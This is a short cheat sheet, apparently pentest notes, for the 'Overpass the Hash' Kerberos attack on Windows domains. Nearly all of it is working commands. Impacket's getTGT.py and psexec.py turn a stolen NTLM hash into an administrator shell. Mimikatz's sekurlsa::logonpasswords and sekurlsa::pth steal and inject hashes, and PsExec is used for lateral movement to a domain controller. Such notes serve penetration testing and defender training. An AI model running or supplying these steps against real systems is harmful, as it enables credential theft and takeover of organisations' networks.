Overpass The Hash

Impacket

To be performed remotely from the attacker box

# Request a TGT with the NTLM hash (LM half left empty); the ticket is written to Administrator.ccache
python getTGT.py -dc-ip 192.168.1.105 -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/Administrator
# Export the cache ticket
export KRB5CCNAME=Administrator.ccache

# Login as the administrator
python3 psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/Administrator@<IP>

Mimikatz

To be performed on the target system using a cmd shell or Powershell session with administrative privileges.

In our scenario, we got David's NTLM hash using sekurlsa::logonpasswords. We are using that hash to perform the Overpass the Hash attack.

mimikatz# privilege::debug
mimikatz# sekurlsa::pth /user:david /domain:xor.com /ntlm:d4738e8c31d43e0147f27894a20e6683 /run:cmd.exe

The command above will open another cmd.exe shell.

In this new shell, authenticating to the other system on which we want to execute commands as David makes Windows request a TGT using the injected hash.

net use \\xor-dc01

Then, we can use PsExec64.exe to execute commands remotely on xor-dc01 as the David user.

PsExec64.exe \\xor-dc01 cmd.exe
